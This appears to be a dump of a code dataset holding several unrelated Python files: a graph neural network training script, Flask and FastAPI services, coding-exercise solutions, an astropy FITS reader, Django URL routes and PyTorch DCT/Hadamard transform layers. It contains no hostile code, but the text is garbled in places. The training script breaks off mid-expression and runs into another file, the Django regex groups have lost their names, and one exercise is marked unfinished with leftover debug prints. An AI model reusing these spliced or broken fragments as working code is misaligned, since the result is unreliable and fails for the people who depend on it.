minlength=num_classes).cpu()\n\n if train:\n loss.backward()\n optimizer.step()\n dataset_len = len(loader.dataset)\n distr_dict = {}\n class_counts /= dataset_len\n if mode_str == \"test\":\n distr_dict = {f\"{mode_str}_percentage_class_{i}\": class_counts[i] for i in range(num_classes)}\n res_dict = {\n f\"{mode_str}_loss\": sum_loss / dataset_len,\n f\"{mode_str}_class_loss\": sum_class_loss / dataset_len,\n f\"{mode_str}_reg_loss\": sum_reg_loss / dataset_len,\n f\"{mode_str}_accuracy\": correct / dataset_len,\n **{f\"{mode_str}_{k}\": v / dataset_len for k, v in sum_add_loss.items()},\n **distr_dict}\n log(res_dict, step=epoch)\n return res_dict\n\ndef main(args, **kwargs) -> Tuple[GraphSENN, Any, DataLoader, DataLoader, DataLoader]:\n \"\"\"\n :param args: The configuration as defined by the commandline arguments\n :param kwargs: additional kwargs to overwrite a loaded config with\n :return: The loaded/trained model, train and test data\n \"\"\"\n if not isinstance(args, dict):\n args = args.__dict__\n restore_path = None\n if args[\"resume\"] is not None:\n api = wandb.Api()\n run_path = 
f\"{custom_logger.wandb_entity}/{custom_logger.wandb_project}/\" + args[\"resume\"]\n run = api.run(run_path)\n save_path = args[\"save_path\"]\n args = run.config\n restore_path = args[\"save_path\"]\n if args[\"save_wandb\"] and not os.path.isfile(restore_path):\n print(\"Downloading checkpoint from wandb...\")\n wandb.restore(restore_path, run_path=run_path)\n args[\"save_path\"] = save_path\n for k, v in kwargs.items():\n args[k] = v\n else:\n if not args[\"use_wandb\"] and args[\"save_wandb\"]:\n print(\"Disabling saving to wandb as logging to wandb is also disabled.\")\n args[\"save_wandb\"] = False\n\n if isinstance(args, dict):\n args = SimpleNamespace(**args)\n\n args = custom_logger.init(args)\n\n device = torch.device(args.device)\n custom_logger.device = device\n torch.manual_seed(args.seed)\n\n data_wrapper = datasets.from_name(args.dataset)\n dataset = data_wrapper.dataset\n num_classes = data_wrapper.num_classes\n num_node_features = data_wrapper.num_node_features\n num_train_samples = int(args.train_split * len(dataset))\n num_val_samples = int(args.val_split * len(dataset))\n train_data = dataset[:num_train_samples]\n val_data = dataset[num_train_samples:num_train_samples+num_val_samples]\n test_data = dataset[num_train_samples + num_val_samples:]\n graphs_to_log = train_data[:args.graphs_to_log] + test_data[:args.graphs_to_log]\n\n train_loader = DataLoader(train_data, batch_size=args.batch_size, shuffle=kwargs.get(\"shuffle\", True))\n val_loader = DataLoader(val_data, batch_size=args.batch_size, shuffle=kwargs.get(\"shuffle\", True))\n test_loader = DataLoader(test_data, batch_size=args.batch_size, shuffle=kwargs.get(\"shuffle\", True))\n log_graph_loader = DataLoader(graphs_to_log, batch_size=1, shuffle=False)\n\n conv_type = next((x for x in CONV_TYPES if x.__name__ == args.conv_type), None)\n if conv_type is None:\n raise ValueError(f\"No convolution type named \\\"{args.conv_type}\\\" found!\")\n gnn_activation = getattr(torch.nn, args.gnn_activation)\n\n gnn_output_size = args.gnn_sizes[-1] if args.gnn_sizes else num_node_features\n if args.senn_pooling:\n if args.feat_reconst_loss_weight != 0 or args.adj_reconst_loss_weight != 0:\n decoder = FullyConnectedMessagePassingDecoder(args.gnn_sizes, num_node_features, \"SAGEConv\", gnn_activation,\n args.h_adj_dec_intermediate, args.h_adj_dec_final)\n else:\n decoder = None\n pool = GraphSENNPool(gnn_output_size, num_classes, args.theta_sizes, args.h_sizes, args.aggregation,\n args.per_class_theta, args.per_class_h, args.global_theta, args.theta_loss_weight,\n args.feat_reconst_loss_weight, args.adj_reconst_loss_weight, decoder, True) # args.learn_h)\n else:\n pool = StandardPoolingLayer(gnn_output_size, num_classes, args.out_sizes, args.aggregation)\n\n\n model = GraphSENN(args.gnn_sizes, num_node_features, num_classes, conv_type, gnn_activation, pool,\n args.concept_activation)\n if restore_path is not None:\n model.load_state_dict(torch.load(restore_path))\n model = model.to(device)\n optimizer = torch.optim.Adam(model.parameters(), lr=args.lr, weight_decay=args.wd)\n\n os.makedirs(os.path.dirname(args.save_path), exist_ok=True)\n best_val_acc = 0\n try:\n for epoch in tqdm(range(args.num_epochs)):\n train_test_epoch(True, model, optimizer, train_loader, epoch, \"train\")\n train_test_epoch(False, model, optimizer, val_loader, epoch, \"test\")\n val_acc = train_test_epoch(False, model, optimizer, test_loader, epoch, \"val\")[\"val_accuracy\"]\n if epoch % args.graph_log_freq == 0:\n pass\n if (args.save_freq > 0 and 
epoch % args.save_freq == 0) or\\\n (args.save_freq == -2 and val_acc > best_val_acc):\n torch.save(model.state_dict(), args.save_path)\n if args.save_wandb:\n wandb.save(args.save_path, policy=\"now\")\n if args.save_freq == -2:\n print(f\"Validation accuracy {100 * val_acc:.2f}%. Saving.\")\n best_val_acc = max(val_acc, best_val_acc)\n if args.num_epochs > 0:\n log({\"best_val_acc\": best_val_acc}, step=epoch)\n except:\n log({\"best_val_acc\": -1}, step=epoch)\n traceback.print_exc()\n\n return model, args, train_loader, val_loader, test_loader\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n\n # Training Details\n parser.add_argument('--lr', type=float, default=0.001,\n help='The Adam learning rate to use.')\n parser.add_argument('--wd', type=float, default=5e-4,\n help='The Adam weight decay to use.')\n parser.add_argument('--num_epochs', type=int, default=1500,\n help='The number of epochs to train for.')\n parser.add_argument('--batch_size', type=int, default=64,\n help='The batch size to use.')\n\n # Architecture\n parser.add_argument('--gnn_sizes', type=int, nargs='*',\n default=[32, 32, 32], dest='gnn_sizes',\n help='The layer sizes to use for the GNN.')\n parser.add_argument('--conv_type', type=str, default=\"GCNConv\", choices=[c.__name__ for c in CONV_TYPES],\n help='The type of graph convolution to use. Note: GATConv does not appear to work with h loss.')\n parser.add_argument('--gnn_activation', type=str, default=\"LeakyReLU\",\n help='Activation function to be used in between the GNN layers')\n parser.add_argument('--aggregation', type=str, default=\"Sum\", choices=[\"Sum\", \"Mean\", \"Max\", \"Min\", \"Mul\", \"Var\",\n \"Std\", \"Softmax\", \"PowerMean\"],\n help='The aggregation function to use over all nodes in the output layer.')\n parser.add_argument('--senn_pooling', action='store_true', help=\"Whether to use our SENN pooling. Baseline \"\n \"otherwise.\")\n parser.add_argument('--no-senn_pooling', dest='senn_pooling', action='store_false')\n parser.set_defaults(senn_pooling=True)\n\n # SENN\n\n parser.add_argument('--concept_activation', type=str, default=\"none\",\n choices=[\"none\", \"sigmoid\", \"softmax\", \"gumbel_softmax\", \"gumbel_softmax_soft\"],\n help='The function applied to the last node embeddings before they serve as input to the h/'\n 'theta networks.')\n\n # h\n parser.add_argument('--h_sizes', type=int, nargs='*',\n default=[128, 1], dest='h_sizes',\n help='The layer sizes to use for the h network. 
Can be empty for identity (of last embedding).')\n parser.add_argument('--per_class_h', action='store_true', help=\"Whether to use a different concept scalar h per \"\n \"class or the same one for all.\")\n parser.add_argument('--no-per_class_h', dest='per_class_h', action='store_false')\n parser.set_defaults(per_class_h=False)\n parser.add_argument('--feat_reconst_loss_weight', type=float, default=0,\n help='The weight of the feature reconstruction in the reconstruction loss.')\n parser.add_argument('--adj_reconst_loss_weight', type=float, default=0,\n help='The weight of the adjacency reconstruction in the reconstruction loss.')\n parser.add_argument('--h_adj_dec_intermediate', type=str, default=AdjGenerationType.IDENTITY.value,\n choices=[v.value for v in AdjGenerationType.__members__.values()],\n help='The type of adjacency reconstruction in intermediate layers when using the '\n 'FullyConnectedMessagePassingDecoder for the h loss.')\n parser.add_argument('--h_adj_dec_final', type=str, default=AdjGenerationType.MLP.value,\n choices=[v.value for v in AdjGenerationType.__members__.values()],\n help='The type of adjacency reconstruction for the final output when using the '\n 'FullyConnectedMessagePassingDecoder for the h loss.')\n parser.add_argument('--learn_h', action='store_true', help=\"Whether to learn h from the GNN output. Otherwise will \"\n \"use one-hot vector of ground truth annotations \"\n \"(assuming they are present and fit)\")\n parser.add_argument('--no-learn_h', dest='learn_h', action='store_false')\n parser.set_defaults(learn_h=True)\n\n # Theta\n parser.add_argument('--theta_sizes', type=int, nargs='*',\n default=[128, 4], dest='theta_sizes',\n help='The layer sizes to use for theta network. Can be empty for identity (of last embedding).')\n parser.add_argument('--per_class_theta', action='store_true', help=\"Whether to use a different concept weight theta\"\n \" per class (this is what SENN does) or the same\"\n \" one for all.\")\n parser.add_argument('--no-per_class_theta', dest='per_class_theta', action='store_false')\n parser.set_defaults(per_class_theta=True)\n parser.add_argument('--global_theta', action='store_true', help=\"Whether to generate theta globally, i.e. \"\n \"concatenate a globally pooled embedding to the \"\n \"node embedding when generating theta.\")\n parser.add_argument('--no-global_theta', dest='global_theta', action='store_false')\n parser.set_defaults(global_theta=False) # This reassembles an attention mechanism\n parser.add_argument('--theta_loss_weight', type=float, default=0,\n help='The weight lambda of the theta regularization loss.')\n\n # No SENN\n parser.add_argument('--out_sizes', type=int, nargs='*',\n default=[128, 4], dest='out_sizes',\n help='The layer sizes to use for the network after aggregation when not using SENN.')\n\n\n # Dataset\n parser.add_argument('--dataset', type=str, default=\"UNIQUE-MOTIF\", choices=[re.sub(r'(? 
5) or any(data[\"stars\"] < 1):\n return 'stars should be betwin 1 and 5.\\n'\n data = data.rename(columns={'stars':'review_stars', 'title':'review_title', 'review':'review_content'})\n tml = Train_master_learning()\n return '{\\n\\n\\t'+ '\"prediction\" : {}, \\n\\t\"score\" : {} '.format(tml.predict(data), tml.score) + '\\n\\n}\\n'\n\nif __name__ == '__main__':\n app.run()","repo_name":"lesueur-philippe/Big-Data","sub_path":"Lesueur_Philippe_train_master_rendu/main/API.py","file_name":"API.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"11260598170","text":"import os\n\ndef gradingStudents(grades):\n r=[]\n for i in grades:\n if i>=38 and i%5>=3:\n r.append(i+5-round(i%5))\n else:\n r.append(i)\n\n return(r)\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n grades_count = int(input().strip())\n grades = []\n for _ in range(grades_count):\n grades_item = int(input().strip())\n grades.append(grades_item)\n result = gradingStudents(grades)\n\n fptr.write('\\n'.join(map(str, result)))\n fptr.write('\\n')\n fptr.close()\n","repo_name":"imPatidar/HackerRankPythonProblems","sub_path":"gradingStudents.py","file_name":"gradingStudents.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"18452563409","text":"class Dashboard:\n def __init__(self, accountId = 0, accountBalance=0, interestPaid=0, accruedInterest=0):\n self.accountId = accountId\n self.accountBalance = accountBalance\n self.interestPaid = interestPaid\n self.accruedInterest = accruedInterest\n\nclass UserTransaction:\n def __init__(self, transactionId = 0, userId = 0, transactionAmt=None, transactionType=None, transactionDate=None):\n self.transactionId = transactionId\n self.userId = userId\n self.transactionAmt = transactionAmt\n self.transactionType = transactionType\n self.transactionDate = transactionDate\n","repo_name":"dbajollari1/lynx","sub_path":"lynx/lynx/dashboard/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"36782481580","text":"import json\nimport asyncio\nimport astropy\n\nfrom astropy.io import fits\n\n\nasync def extract_fits_header(filepath, loop=None):\n if not loop:\n loop = asyncio.get_event_loop()\n handle = await loop.run_in_executor(None, fits.open, filepath)\n hdr_dict = {}\n hdr = handle[0].header\n for key in hdr.keys():\n value = hdr[key]\n if isinstance(value, astropy.io.fits.header._HeaderCommentaryCards):\n value = [i for i in value]\n hdr_dict[key] = value\n return hdr_dict\n","repo_name":"AusSRC/SoFiAX","sub_path":"sofiax/fits.py","file_name":"fits.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"99"} +{"seq_id":"7626305990","text":"from fastapi import FastAPI, HTTPException\nfrom pydantic import BaseModel\nimport sqlite3\nimport os\n\napp = FastAPI()\n\n# Connessione al database\ndb_path = os.path.abspath('../database/sqlite/db.sqlite')\n\ndef connect_db():\n return sqlite3.connect(db_path)\n\nclass Customer(BaseModel):\n Customer_ID: int\n Age: int\n Gender: str\n Item_Purchased: str\n Category: str\n Purchase_Amount: float\n Location: str\n Size: str\n Color: str\n Season: str\n Review_Rating: float\n Subscription_Status: str\n 
Payment_Method: str\n Shipping_Type: str\n Discount_Applied: str\n Promo_Code_Used: str\n Previous_Purchases: int\n Preferred_Payment_Method: str\n Frequency_of_Purchases: str\n\n#GET \n\n@app.get('/customers', response_model=list[Customer])\nasync def get_all_customers():\n conn = None # Move this line to here\n\n try:\n conn = connect_db()\n cursor = conn.cursor()\n\n cursor.execute('SELECT * FROM CustomerData')\n customers = cursor.fetchall()\n\n customer_list = [Customer(\n Customer_ID=row[0], Age=row[1], Gender=row[2], Item_Purchased=row[3],\n Category=row[4], Purchase_Amount=row[5], Location=row[6],\n Size=row[7], Color=row[8], Season=row[9], Review_Rating=row[10],\n Subscription_Status=row[11], Payment_Method=row[12], Shipping_Type=row[13],\n Discount_Applied=row[14], Promo_Code_Used=row[15], Previous_Purchases=row[16],\n Preferred_Payment_Method=row[17], Frequency_of_Purchases=row[18]\n ) for row in customers]\n\n return customer_list\n\n except sqlite3.Error as e:\n raise HTTPException(status_code=500, detail=f'SQLite error: {e}')\n\n finally:\n if conn:\n conn.close()\n\n#POST\n\n@app.post('/customers', response_model=Customer)\nasync def create_customer(customer: Customer):\n try:\n conn = connect_db()\n cursor = conn.cursor()\n\n # Assuming CustomerData table structure: (Customer_ID, Age, Gender, ...)\n cursor.execute(\"\"\"\n INSERT INTO CustomerData\n VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)\n \"\"\", (\n customer.Customer_ID, customer.Age, customer.Gender, customer.Item_Purchased,\n customer.Category, customer.Purchase_Amount, customer.Location,\n customer.Size, customer.Color, customer.Season, customer.Review_Rating,\n customer.Subscription_Status, customer.Payment_Method, customer.Shipping_Type,\n customer.Discount_Applied, customer.Promo_Code_Used, customer.Previous_Purchases,\n customer.Preferred_Payment_Method, customer.Frequency_of_Purchases\n ))\n\n conn.commit()\n\n return customer\n\n except sqlite3.Error as e:\n raise HTTPException(status_code=500, detail=f'SQLite error: {e}')\n\n finally:\n if conn:\n conn.close()\n\n # PUT \n@app.put('/customers/{customer_id}', response_model=Customer)\nasync def update_customer(customer_id: int, customer: Customer):\n try:\n conn = connect_db()\n cursor = conn.cursor()\n\n cursor.execute(\"\"\"\n UPDATE CustomerData\n SET Age=?, Gender=?, Item_Purchased=?, Category=?, Purchase_Amount=?,\n Location=?, Size=?, Color=?, Season=?, Review_Rating=?, Subscription_Status=?,\n Payment_Method=?, Shipping_Type=?, Discount_Applied=?, Promo_Code_Used=?,\n Previous_Purchases=?, Preferred_Payment_Method=?, Frequency_of_Purchases=?\n WHERE Customer_ID=?\n \"\"\", (\n customer.Age, customer.Gender, customer.Item_Purchased,\n customer.Category, customer.Purchase_Amount, customer.Location,\n customer.Size, customer.Color, customer.Season, customer.Review_Rating,\n customer.Subscription_Status, customer.Payment_Method, customer.Shipping_Type,\n customer.Discount_Applied, customer.Promo_Code_Used, customer.Previous_Purchases,\n customer.Preferred_Payment_Method, customer.Frequency_of_Purchases, customer_id\n ))\n\n conn.commit()\n\n return customer\n\n except sqlite3.Error as e:\n raise HTTPException(status_code=500, detail=f'SQLite error: {e}')\n\n finally:\n if conn:\n conn.close()\n\n# DELETE \n@app.delete('/customers/{customer_id}', response_model=dict)\nasync def delete_customer(customer_id: int):\n try:\n conn = connect_db()\n cursor = conn.cursor()\n\n # Assuming CustomerData table structure: (Customer_ID, Age, Gender, 
...)\n cursor.execute(\"DELETE FROM CustomerData WHERE Customer_ID=?\", (customer_id,))\n conn.commit()\n\n return {\"message\": f\"Customer {customer_id} deleted successfully\"}\n\n except sqlite3.Error as e:\n raise HTTPException(status_code=500, detail=f'SQLite error: {e}')\n\n finally:\n if conn:\n conn.close()\n\n\n","repo_name":"ErGiacky/DataAnaliticsMachineLearningExam","sub_path":"database/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":4900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"10449062874","text":"import math\nimport os\nimport random\nimport re\nimport sys\n\n#\n# Complete the 'diagonalDifference' function below.\n#\n# The function is expected to return an INTEGER.\n# The function accepts 2D_INTEGER_ARRAY arr as parameter.\n#\n\n#program is not completed\n\n\ndef diagonalDifference(arr):\n # Write your code here\n print('ho')\n differnce = 0\n leftDiagonalSum = 0\n rightDiagonalSum = 0\n\n for i in range(0, len(arr)):\n for j in range(0, len(arr)):\n if(i == j):\n leftDiagonalSum = leftDiagonalSum + arr[i][j]\n if(i+j == (len(arr) - 1)):\n print(arr[i][j])\n rightDiagonalSum = rightDiagonalSum + arr[i][j]\n\n print(leftDiagonalSum, rightDiagonalSum)\n\n differnce = abs(leftDiagonalSum - rightDiagonalSum)\n\n return differnce\n\n\nif __name__ == '__main__':\n # fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n # n = int(input(\"Enter the number of rows:\"))\n\n # Initialize matrix\n matrix = []\n # print(\"Enter the entries rowwise:\")\n\n # For user input\n # for i in range(n): # A for loop for row entries\n # a = []\n # for j in range(n): # A for loop for column entries\n # a.append(int(input()))\n # matrix.append(a)\n\n # print(matrix)\n\n matrix5 = [[11, 2, 4], [4, 5, 6], [10, 8, -12]]\n\n print('answer', diagonalDifference(matrix5))\n\n # fptr.write(str(result) + '\\n')\n\n # fptr.close()\n\n# 11 2 4\n# 4 5 6\n# 10 8 -12\n","repo_name":"shelcia/InterviewQuestionPython","sub_path":"ArrayPrograms/diagonalDifference.py","file_name":"diagonalDifference.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"28445778833","text":"\nfrom django.conf.urls import patterns, url\nfrom report import views\n\nurlpatterns = patterns(\"\",\n url(r\"^FT/(?P\\w+)/$\", views.showTableFT),\n url(r\"^FT/(?P\\w+)/(?P\\w+%?)/$\", views.showTableFT),\n url(r\"^Repoos/(?P\\w+)/$\", views.showTableRep),\n url(r\"^Repoos/(?P\\w+)/Repoos/(?P\\w+%?)/$\", views.showTableRep),\n )\n\n","repo_name":"weichetaru/charttest","sub_path":"kpidashboard/report/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"10150862944","text":"import torch\nfrom torch import nn\nfrom torch.nn import functional as F\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.linalg import hadamard, block_diag\n\n__all__ = [\"HarmonicBlock\", \"HadamardBlock\", \"SlantBlock\"]\n\n\nclass TransformBlock(nn.Module):\n def __init__(\n self,\n input_channels,\n output_channels,\n bn=True,\n dropout=False,\n kernel_size=3,\n padding=1,\n stride=1,\n alpha_root=None,\n add_noise=False,\n lmbda=None,\n diag=False,\n bias=False,\n use_res=True,\n ):\n super().__init__()\n self._cuda = torch.cuda.is_available()\n self.bn = bn # flag for batchnorm (True/False)\n self.drop = dropout # flag for dropout (True/False)\n 
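# Cache the constructor arguments; the subclasses use them to build the fixed transform filter bank\n        # and the 1x1 linear-combination convolution (self.conv).\n        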
self.input_channels = input_channels\n self.output_channels = output_channels\n self.padding = padding\n self.stride = stride\n self.kernel_size = kernel_size\n self.bias = bias # flag for bias\n self.diag = diag # select only diagonal filters\n self.use_res = use_res # use residual connection or not\n self.alpha_root = alpha_root # use rooting, i.e. (input.pow(alpha))\n # Filters based on transform\n self.filter_bank = None\n # Linear Combination conv\n self.conv = None\n # Shortcut is the downsampling layer. It preserves the input info\n self.shortcut = nn.Identity()\n # if use_res is False,\n # it is just identity mapping\n if (input_channels != output_channels or stride != 1) and self.use_res:\n ks = 2 if self.kernel_size % 2 == 0 else 1\n p = 1 if ks == 2 else 0\n self.shortcut = nn.Sequential(\n nn.Conv2d(\n input_channels,\n output_channels,\n padding=p,\n kernel_size=ks,\n stride=stride,\n bias=False,\n ),\n nn.BatchNorm2d(output_channels),\n )\n\n if add_noise:\n self.noise = nn.Parameter(\n nn.init.normal_(\n torch.randn(1, self.filter_bank.size(0)), std=1e-4\n )\n )\n else:\n self.noise = None\n if lmbda is not None:\n # limits the number of kernels\n self.lmbda = min(lmbda, self.kernel_size ** 2)\n else:\n self.lmbda = lmbda\n\n \"\"\"\n Base class for any tranform-based layer.\n Main idea: compute window-based transform from each channel,\n combine linearly through 1x1 convolution.\n Class allows use of residual connection as in ResNets.\n \"\"\"\n\n @classmethod\n def get_idx(self, ker: int, lmbda: int):\n \"\"\"Return indices for partial filter usage, see Ulicny et al. 2018.\"\"\"\n out = []\n for i in range(ker):\n for j in range(ker):\n if i + j < lmbda:\n out.append(ker * i + j)\n return tuple(out)\n\n @classmethod\n def get_idx_diag(self, ker):\n \"\"\"Return only diagonal indices for partial filter usage.\"\"\"\n out = []\n for i in range(ker):\n for j in range(ker):\n if i == j:\n out.append(i + j)\n return tuple(out)\n\n @classmethod\n def draw_filters(self, fb_=None, figsize=(12, 4)):\n \"\"\"Display visual representation of all filters as a grid.\n\n Parameters:\n fb_: any filter bank to display. 
If `None` is passed,\n the default filter bank of the class is shown.\n This argument must comply with PyTorch's weight shapes.\n figsize: a 2-tuple of integers, compatible with `figsize` of\n `matplotlib.pyplot`\n \"\"\"\n if not fb_:\n fb_ = self.filter_bank\n fig, ax = plt.subplots(len(fb_), 1, figsize=figsize)\n for i in range(len(fb_)):\n ax[i].imshow(fb_[i, 0, :, :])\n ax[i].axis(\"off\")\n ax[i].grid(False)\n\n def filter_from_matrix(self, i, j, size):\n raise NotImplementedError\n\n def get_filter_bank(\n self, kernel_size, input_channels=3, lmbda=None, diag=False, **kwargs\n ):\n \"\"\"Build filter bank from a matrix.\n\n Parameters:\n :kernel_size: integer, determines sizes of filters.\n input\n \"\"\"\n filter_bank = torch.zeros(\n (kernel_size, kernel_size, kernel_size, kernel_size)\n )\n for i in range(kernel_size):\n for j in range(kernel_size):\n filter_bank[i, j, :, :] = self.filter_from_matrix(\n i=i, j=j, size=kernel_size\n )\n if lmbda:\n ids = self.get_idx(kernel_size, lmbda)\n return torch.stack(\n tuple(\n [\n (filter_bank.view(-1, 1, kernel_size, kernel_size))[\n ids, ...\n ]\n ]\n * input_channels\n ),\n dim=0,\n ).view((-1, 1, kernel_size, kernel_size))\n if diag:\n ids = self.get_idx_diag(kernel_size)\n return torch.stack(\n tuple(\n [\n filter_bank.view(-1, 1, kernel_size, kernel_size)[\n ids, ...\n ]\n ]\n * input_channels\n ),\n dim=0,\n ).view((-1, 1, kernel_size, kernel_size))\n return torch.stack(\n tuple(\n [filter_bank.view(-1, 1, kernel_size, kernel_size)]\n * input_channels\n ),\n dim=0,\n ).view((-1, 1, kernel_size, kernel_size))\n\n @classmethod\n def alpha_rooting(self, x, alpha=1.0):\n if alpha is not None:\n return x.sign() * torch.abs(x).pow(alpha)\n else:\n return x\n\n\nclass HarmonicBlock(TransformBlock):\n def __init__(\n self,\n *args,\n type=2,\n droprate=0.5,\n **kwargs,\n ):\n super(HarmonicBlock, self).__init__(*args, **kwargs)\n self.type = type\n self.filter_bank = self.get_filter_bank(\n kernel_size=self.kernel_size, # kernel size\n input_channels=self.input_channels,\n t=self.type, # type of DCT\n lmbda=self.lmbda,\n diag=self.diag,\n ).float()\n if self._cuda:\n self.filter_bank = self.filter_bank.cuda()\n self.conv = nn.Conv2d(\n in_channels=self.filter_bank.shape[0],\n out_channels=self.output_channels,\n kernel_size=1,\n padding=0,\n stride=1,\n bias=self.bias,\n )\n if self.bn:\n self.bnorm = nn.BatchNorm2d(self.filter_bank.shape[0])\n if self.drop:\n self.dropout = nn.Dropout(droprate)\n\n @staticmethod\n def dct_matrix(t=2, N=32):\n if t == 1:\n # N- the size of the input\n # n is the column dummy index, k is the row dummy index\n res = np.zeros((N, N))\n res[:, 0] = 0.5\n for p in range(N):\n res[p, -1] = (-1) ** p\n for n in range(1, N - 1):\n for k in range(N):\n res[k, n] = np.cos(np.pi / (N - 1) * n * k)\n return res\n if t == 2:\n res = np.zeros((N, N))\n for k in range(N):\n for n in range(N):\n res[k, n] = np.cos(np.pi / (N) * (n + 0.5) * k)\n return res\n if t == 3:\n res = np.zeros((N, N))\n res[:, 0] = 0.5\n for n in range(1, N):\n for k in range(N):\n res[k, n] = np.cos(np.pi / (N) * n * (k + 0.5))\n return res\n if t == 4:\n res = np.zeros((N, N))\n for k in range(N):\n for n in range(N):\n res[k, n] = np.cos(np.pi / (N) * (n + 0.5) * (k + 0.5))\n return res\n\n def filter_from_matrix(self, i, j, size):\n mat = self.dct_matrix(t=self.type, N=size)\n fltr = (\n mat[i, : self.kernel_size]\n .reshape((-1, 1))\n .dot(mat[j, : self.kernel_size].reshape(1, -1))\n )\n return torch.as_tensor(fltr)\n\n def forward(self, 
x):\n in_ = x\n x = F.conv2d(\n x.float(),\n weight=self.filter_bank,\n padding=self.padding,\n stride=self.stride,\n groups=self.input_channels,\n ) # int(self.K/\n x = self.alpha_rooting(x, alpha=self.alpha_root)\n if self.noise is not None:\n x.add_(self.noise.unsqueeze(-1).unsqueeze(-1))\n if self.bn:\n x = F.relu(self.bnorm(x))\n else:\n x = F.relu(x)\n if self.drop:\n x = self.dropout(x)\n if self.use_res:\n x = self.conv(x) + self.shortcut(in_)\n else:\n x = self.conv(x)\n x = F.relu(x)\n return x\n\n\nclass HadamardBlock(TransformBlock):\n def __init__(self, *args, walsh=False, droprate=0.5, **kwargs):\n \"\"\"\n Block based on Hadamard transform. Two types of transform are usable:\n Hadamard-Walsh transform and Hadamard-Paley transform.\n \"\"\"\n super(HadamardBlock, self).__init__(*args, **kwargs)\n self.walsh = walsh\n self.filter_bank = self.get_filter_bank(\n kernel_size=self.kernel_size, # kernel size\n input_channels=self.input_channels,\n walsh=self.walsh, # type of Hadamard Transform\n lmbda=self.lmbda,\n diag=self.diag,\n ).float()\n if self._cuda:\n # Checks if cuda is available at all\n self.filter_bank = self.filter_bank.cuda()\n self.conv = nn.Conv2d(\n in_channels=self.filter_bank.shape[0],\n out_channels=self.output_channels,\n kernel_size=1,\n padding=0,\n stride=1,\n bias=self.bias,\n )\n if self.bn:\n self.bnorm = nn.BatchNorm2d(self.filter_bank.shape[0])\n if self.drop:\n self.dropout = nn.Dropout(droprate)\n\n def filter_from_matrix(self, i, j, size):\n def paley(n):\n N = 2 ** n\n P_1 = np.array([1])\n P_2 = np.block([[np.kron(P_1, [1, 1])], [np.kron(P_1, [1, -1])]])\n if N == 1: # n=0\n return P_1\n elif N == 2: # n=1\n return P_2\n else:\n i = 2\n while i >= 2 and i <= n:\n P_1 = P_2\n P_2 = np.block(\n [[np.kron(P_1, [1, 1])], [np.kron(P_1, [1, -1])]]\n )\n\n i += 1\n\n return P_2\n\n if self.walsh:\n h = hadamard(\n min(2 ** (size - 1).bit_length(), 1024)\n ) # /np.sqrt(32)\n else:\n h = paley(size)\n f = np.dot(h[i, :size].reshape(-1, 1), h[j, :size].reshape(1, -1))\n return torch.as_tensor(f)\n\n def forward(self, x):\n in_ = x\n x = F.conv2d(\n x.float(),\n weight=self.filter_bank,\n padding=self.padding,\n stride=self.stride,\n groups=self.input_channels,\n ) # int(self.K/\n x = self.alpha_rooting(x, alpha=self.alpha_root)\n if self.noise is not None:\n x.add_(self.noise.unsqueeze(-1).unsqueeze(-1))\n if self.bn:\n x = F.relu(self.bnorm(x))\n else:\n x = F.relu(x)\n if self.drop:\n x = self.dropout(x)\n if self.use_res:\n x = self.conv(x) + self.shortcut(in_)\n else:\n x = self.conv(x)\n x = F.relu(x) # ?? 
do we need this relu layer?\n return x\n\n\nclass SlantBlock(TransformBlock):\n def __init__(self, *args, droprate=0.5, **kwargs):\n super(SlantBlock, self).__init__(*args, **kwargs)\n self.filter_bank = self.get_filter_bank(\n kernel_size=self.kernel_size, # kernel size\n input_channels=self.input_channels,\n lmbda=self.lmbda,\n diag=self.diag,\n ).float()\n if self._cuda:\n self.filter_bank = self.filter_bank.cuda()\n self.conv = nn.Conv2d(\n in_channels=self.filter_bank.shape[0],\n out_channels=self.output_channels,\n kernel_size=1,\n padding=0,\n stride=1,\n bias=self.bias,\n )\n if self.bn:\n self.bnorm = nn.BatchNorm2d(self.filter_bank.shape[0])\n if self.drop:\n self.dropout = nn.Dropout(droprate)\n\n def filter_from_matrix(self, i, j, size):\n def slant(n):\n N = (2 ** (size - 1)).bit_length()\n S_1 = 1 / np.sqrt(2) * np.array([[1, 1], [1, -1]])\n\n an = np.sqrt((2 * N ** 2) / (4 * N ** 2 - 1)) # a2\n bn = np.sqrt((N ** 2 - 1) / (4 * N ** 2 - 1)) # b2\n\n S_2 = (\n 1\n / np.sqrt(2)\n * np.array(\n [\n [1, 0, 1, 0],\n [an, bn, -an, bn],\n [0, 1, 0, -1],\n [-bn, an, bn, an],\n ]\n )\n )\n\n S_2 = np.matmul(S_2, block_diag(S_1, S_1))\n\n if N == 2:\n return S_1\n elif N == 4:\n return S_2\n else:\n S_prev = S_2\n i = 3\n while i >= 3 and i <= n:\n N = 2 ** i\n an = np.sqrt((3 * N ** 2) / (4 * N ** 2 - 1)) # a2\n bn = np.sqrt((N ** 2 - 1) / (4 * N ** 2 - 1))\n An1 = np.array([[1, 0], [an, bn]])\n An2 = np.array([[1, 0], [-an, bn]])\n Bn1 = np.array([[0, 1], [-bn, an]])\n Bn2 = np.array([[0, -1], [bn, an]])\n S_N = np.block(\n [\n [\n An1,\n np.zeros((2, N // 2 - 2)),\n An2,\n 